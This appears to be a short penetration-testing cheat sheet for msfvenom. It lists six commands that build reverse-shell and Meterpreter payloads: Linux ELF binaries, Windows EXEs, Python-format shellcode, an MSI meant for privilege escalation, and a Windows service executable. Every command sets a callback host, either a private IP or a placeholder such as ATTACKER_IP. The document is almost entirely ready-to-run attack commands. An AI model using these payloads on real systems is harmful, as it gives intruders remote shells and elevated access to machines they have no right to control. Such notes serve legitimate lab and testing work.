Msfvenom
Description
Msfvenom is used for generating payloads and encoders. It can create reverse shells, bind shells, and other payloads in various formats (exe, elf, py, msi, etc.) for different platforms.
Usage 1: Linux Reverse Shell (x64 ELF)
Command:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.16.40.5 LPORT=4444 -f elf -o payload1.bin
Usage 2: Linux Meterpreter Reverse Shell (x86 ELF)
Command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.40.5 LPORT=4444 -f elf -o payload.bin
Usage 3: Windows Reverse Shell (x64 EXE)
Command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -f exe > shell.exe
Usage 4: Windows Reverse Shell with Bad Characters (Python format)
Command:
msfvenom -p windows/shell/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -b "\x00\x0a\x0d" -f py
Usage 5: Windows MSI Package (for privilege escalation)
Command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
Usage 6: Windows Service Executable
Command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe